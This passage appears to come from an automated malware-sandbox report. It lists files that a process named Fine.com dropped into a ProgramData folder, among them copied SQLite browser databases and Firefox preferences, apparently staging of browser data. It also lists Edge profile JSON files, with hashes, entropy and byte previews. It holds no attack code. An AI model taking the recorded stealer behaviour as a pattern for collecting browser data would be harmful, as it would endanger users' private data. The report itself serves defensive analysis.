                                                                                                                                                                                                                                                                                                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\ProgramData\PP89HD2DTRQQ\DJMYUA

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):9504
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.512408163813622
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                                                                                                                                                                                                                                          MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                                                                                                                                                                                                                                          SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                                                                                                                                                                                                                                          SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                                                                                                                                                                                                                                          SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                                                                          C:\ProgramData\PP89HD2DTRQQ\HD2DTJ

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\ProgramData\PP89HD2DTRQQ\HDJEU3

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\ProgramData\PP89HD2DTRQQ\HDTJW4E37

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):51200
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\ProgramData\PP89HD2DTRQQ\RQ9000

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):294912
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.08438200565341271
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v4U:51zkVmvQhyn+Zoz67NU
                                                                                                                                                                                                                                                                                                                          MD5:F7EEE7B0D281E250D1D8E36486F5A2C3
                                                                                                                                                                                                                                                                                                                          SHA1:309736A27E794672BD1BDFBAC69B2C6734FC25CE
                                                                                                                                                                                                                                                                                                                          SHA-256:378DD46FE8A8AAC2C430AE8A7C5C1DC3C2A343534A64A263EC9A4F1CE801985E
                                                                                                                                                                                                                                                                                                                          SHA-512:CE102A41CA4E2A27CCB27F415D2D69A75A0058BA0F600C23F63B89F30FFC982BA48336140714C522B46CC6D13EDACCE3DF0D6685D02844B8DB0AD3378DB9CABB
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\ProgramData\PP89HD2DTRQQ\WBIEKN

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\ProgramData\PP89HD2DTRQQ\XLFUAS

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.265130411026952
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:8/2qOB1nxCkMYSAELyKOMq+8yC8F/YfU5m+OlTLVum+:Bq+n0JY9ELyKOMq+8y9/Owd
                                                                                                                                                                                                                                                                                                                          MD5:1D5CF1DF51AACAAB4C9BC5F870931500
                                                                                                                                                                                                                                                                                                                          SHA1:ADEC7026A99F9E7BAFA34C90EACADC4AB146497C
                                                                                                                                                                                                                                                                                                                          SHA-256:934E4FD261421F160144C5F1FCA95B2A82ADFD64EE09F4A04D824270DC8F73D2
                                                                                                                                                                                                                                                                                                                          SHA-512:DB345A6C3628326B25B7B4A28E7A0F12913FBAF035AFDED90A0D257C51DEBDE3461F741598EA71DC012523BB1DBB0218E504A8FC609EBF64C24ECD31F7415A19
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\08747e20-5517-4575-ad69-49db634a83fe.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):44612
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.096684137492156
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBRwu8hDO6vP6OgNou5uLtMdcGoup1Xl3jVzXr4CCz:z/Ps+wsI7ynEH6AyuBchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                          MD5:F27C4EA160A884EC7A22DBDD9A5FF0BE
                                                                                                                                                                                                                                                                                                                          SHA1:5A8EA7573E508786D158477FA8A637464073EE67
                                                                                                                                                                                                                                                                                                                          SHA-256:C69850C3629F179C96723EF836BAD02F3685B6B0C09B3D17000D062431D4415B
                                                                                                                                                                                                                                                                                                                          SHA-512:C450EC106DCF64DF7CAB8688CB4977711A3724C222F0FE15E1D282F769AC6FD66A8D27D07FBBCC6D20A20DC8CB78D51D5BBF3257A66A70B7ECC31A8C442AA18D
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\28e61234-b778-4c51-a582-47aa8063cbf2.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):45882
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.090364441425301
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:7MkbJ6eg6KzhXRLrD9r4oUuphDO6vP6OgNouxc9y95XsAv8CAoDGoup1Xl3jVzXh:7Mk16zRRvD9r66AyutXORoDhu3VlXr42
                                                                                                                                                                                                                                                                                                                          MD5:E8AAF2D71D770475060F1ADC4A9B0EC3
                                                                                                                                                                                                                                                                                                                          SHA1:793CAF56DE623AF252B6D7A8918B9C2B936DE986
                                                                                                                                                                                                                                                                                                                          SHA-256:B1CD84C9BA191902B55231A6C9B5A329737DE4BFA8966D7F1A29415BFD2B684E
                                                                                                                                                                                                                                                                                                                          SHA-512:97034B6FE670F9D40EA4413AD5C19FC1816D6E2F9AC3EA4DC934DAF7924198FAC8496274E95758BE0D69C11EE39E02FCF0144D5A01813FAADB7B648CE72AE16A
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736698990"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\541291f8-d168-4094-9549-6b8ef886fc54.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                                                          Size (bytes):44612
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.096684137492156
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBRwu8hDO6vP6OgNou5uLtMdcGoup1Xl3jVzXr4CCz:z/Ps+wsI7ynEH6AyuBchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                          MD5:F27C4EA160A884EC7A22DBDD9A5FF0BE
                                                                                                                                                                                                                                                                                                                          SHA1:5A8EA7573E508786D158477FA8A637464073EE67
                                                                                                                                                                                                                                                                                                                          SHA-256:C69850C3629F179C96723EF836BAD02F3685B6B0C09B3D17000D062431D4415B
                                                                                                                                                                                                                                                                                                                          SHA-512:C450EC106DCF64DF7CAB8688CB4977711A3724C222F0FE15E1D282F769AC6FD66A8D27D07FBBCC6D20A20DC8CB78D51D5BBF3257A66A70B7ECC31A8C442AA18D
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\7494fedc-71bd-4819-95e5-ebac2e03b9fe.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):44137
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.090701653009998
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBM7wuF9hDO6vP6O+Htbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEb6atbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                          MD5:B1E33281FC96CFB88C007D0DEA609E34
                                                                                                                                                                                                                                                                                                                          SHA1:59410F20031946D787319DC6E1CDD9EA7EAD2F18
                                                                                                                                                                                                                                                                                                                          SHA-256:4C6618F86470F93A307C58567815A110CE827EF6E580DA251124BC7C9E0DCB67
                                                                                                                                                                                                                                                                                                                          SHA-512:4A172A5FAB051C8A1487EB6738C1BEC69E56206BD31AE3E74C38781348E727A3CE27E42E81C18385FB0980564BD009214C54EA2192E011E1EBA47150AC11BD19
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\2c137edb-988a-4a6a-ab68-c01c17367e47.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):107893
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.640159940159965
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P70:fwUQC5VwBIiElEd2K57P70
                                                                                                                                                                                                                                                                                                                          MD5:9B9EEAFEA0BB753A8FAEB453AB956772
                                                                                                                                                                                                                                                                                                                          SHA1:4F886474C956DB363B327F13F3E65B53807DB52A
                                                                                                                                                                                                                                                                                                                          SHA-256:F8ADE4E5D3BCFEC0035529AC7AEA621E1FB3CEF0DAC19E62521BA8433AC9A894
                                                                                                                                                                                                                                                                                                                          SHA-512:F3E66357046E24C3CB5D11A9E7FC7BA60393C00878D0C01DF87CEA10DCAE0F93CBBC8522C8FD92F58622E17EF2481FAECA509010FE842577016E4B201C836930
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):107893
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.640159940159965
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P70:fwUQC5VwBIiElEd2K57P70
                                                                                                                                                                                                                                                                                                                          MD5:9B9EEAFEA0BB753A8FAEB453AB956772
                                                                                                                                                                                                                                                                                                                          SHA1:4F886474C956DB363B327F13F3E65B53807DB52A
                                                                                                                                                                                                                                                                                                                          SHA-256:F8ADE4E5D3BCFEC0035529AC7AEA621E1FB3CEF0DAC19E62521BA8433AC9A894
                                                                                                                                                                                                                                                                                                                          SHA-512:F3E66357046E24C3CB5D11A9E7FC7BA60393C00878D0C01DF87CEA10DCAE0F93CBBC8522C8FD92F58622E17EF2481FAECA509010FE842577016E4B201C836930
                                                                                                                                                                                                                                                                                                                          Malicious:false
